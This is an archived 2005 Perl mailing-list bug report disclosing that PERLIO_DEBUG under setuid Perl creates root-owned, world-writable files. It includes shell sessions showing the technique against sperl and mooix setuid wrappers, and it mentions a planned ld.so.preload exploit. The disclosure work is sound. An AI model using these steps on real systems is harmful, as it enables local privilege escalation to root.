[perl #33990] setuid perl security issues

Front page | perl.perl5.porters | Postings from January 2005

[perl #33990] setuid perl security issues

Thread Next

From:

Date:

January 30, 2005 12:50

Subject:

[perl #33990] setuid perl security issues

Message ID:

rt-3.0.11-33990-106770.16.2437313715399@perl.org

# New Ticket Created by  "KF (Lists)" 
# Please include the string:  [perl #33990]
# in the subject line of all future correspondence about this issue. 
# <URL: https://rt.perl.org/rt3/Ticket/Display.html?id=33990 >


PERLIO_DEBUG
If set to the name of a file or device then certain operations of PerlIO
sub-system will be logged to that file (opened as append). Typical uses
are UNIX:

./perlio.c:    
void
PerlIO_debug(const char *fmt, ...)
{
...
    if (!dbg) {
        char *s = PerlEnv_getenv("PERLIO_DEBUG");
        if (s && *s)
            dbg = PerlLIO_open3(s, O_WRONLY | O_CREAT | O_APPEND, 0666);
        else
            dbg = -1;
    }


If $ENV{'PERLIO_DEBUG'} is not set PerlIO_debug() is a no-op.

else you can do the following either via sperl or vial sperl: 

sperl:
kfinisterre@jdam:~$ ls -al /usr/bin/sperl5.8.4
-rwsr-xr-x  1 root root 63808 2004-12-11 18:32 /usr/bin/sperl5.8.4
kfinisterre@jdam:~$ export PERLIO_DEBUG=/tmp/aaa
kfinisterre@jdam:~$ umask 001
kfinisterre@jdam:~$ /usr/bin/sperl5.8.4
sperl needs fd script
You should not call sperl directly; do you need to change a #! line
from sperl to perl?
kfinisterre@jdam:~$ ls -al /tmp/aaa
-rw-rw-rw-  1 root kfinisterre 1403 2005-01-30 02:34 /tmp/aaa

setuid wrapper:
kfinisterre@jdam:/tmp$ ls -al /usr/sbin/mooix-pty-helper
/usr/sbin/mooregister /usr/sbin/moopasswd
-rwsr-xr-x  1 root root 2872 2003-11-20 15:28/usr/sbin/mooix-pty-helperc
-rwsr-xr-x  1 root root 2832 2003-11-20 15:28 /usr/sbin/moopasswd
-rwsr-xr-x  1 root root 2836 2003-11-20 15:28 /usr/sbin/mooregister

These are all setuid programs that invoke perl scripts.

/usr/share/mooix/mooix-pty-helper.pl
/usr/share/mooix/moopasswd.pl
/usr/share/mooix/mooregister.pl

kfinisterre@jdam:/tmp$ umask 001
kfinisterre@jdam:/tmp$ export PERLIO_DEBUG=/tmp/oops2
kfinisterre@jdam:/tmp$ /usr/sbin/mooix-pty-helper
need a session dir at /usr/share/mooix/mooix-pty-helper.pl line 22,
<CONFIG> line 98.
kfinisterre@jdam:/tmp$ ls -al /tmp/oops2
-rw-rw-rw-  1 root kfinisterre 30285 2005-01-30 02:23 /tmp/oops2

kfinisterre@jdam:/tmp$ tail /tmp/oops2 -n 3
/usr/share/mooix/mooix-pty-helper.pl:0 fd 0 refcnt=0
/usr/share/mooix/mooix-pty-helper.pl:0 fd 1 refcnt=0
/usr/share/mooix/mooix-pty-helper.pl:0 fd 2 refcnt=0

kfinisterre@jdam:/tmp$ echo + + > /tmp/oops2

hrmmm...
kfinisterre@jdam:~$ ls -al /etc/ld.so.preload
ls: /etc/ld.so.preload: No such file or directory

gonna try to write an ld.so.preload exploit without trashing my box. hehe. fun time.

Thread Next

[perl #33990] setuid perl security issues by KF

Re: [perl #33990] setuid perl security issues by Rafael Garcia-Suarez

Re: [perl #33990] setuid perl security issues by Rafael Garcia-Suarez

Re: [perl #33990] setuid perl security issues by Rafael Garcia-Suarez

nntp.perl.org: Perl Programming lists via nntp and http.
Comments to Ask Bjørn Hansen at ask@perl.org | Group listing | About